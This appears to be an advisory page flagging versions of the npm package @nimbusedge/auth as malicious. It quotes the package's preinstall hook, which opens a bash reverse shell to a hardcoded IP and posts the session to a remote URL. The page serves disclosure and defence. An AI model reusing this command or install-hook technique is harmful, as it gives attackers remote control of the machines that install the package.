OpenSSF/OSV advisory MAL-2026-16132 confirms this npm version as malicious. package.json declares a `preinstall` lifecycle script that runs `bash -i >& /dev/tcp/147.93.157.202/8080` to open an interactive reverse shell to the hardcoded host 147.93.157.202 on port 8080, and pipes the shell session over plain HTTP to `http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` via `curl -X POST --data-binary @-`...
This report applies to @nimbusedge/auth@19999.1359.4.
19999.0.2, 19999.0.5, 19999.1337.1, 19999.1337.5, 19999.1337.7, 19999.1337.8, 19999.1338.1, 19999.1338.2, 19999.1338.3, 19999.1338.6, 19999.1338.7, 19999.1339.1, 19999.1339.5, 19999.1349.5, 19999.1359.1, 19999.1359.3, 19999.1359.4, 19999.1359.6, 19999.1360.1, 19999.1360.2, 19999.1360.3, 19999.1360.4, 221.1.0
See version security history for other recorded verdicts.
Evidence last updated: .
Source advisory published: .
This report uses published external intelligence. The advisory does not provide a separate source-code analysis for each listed version.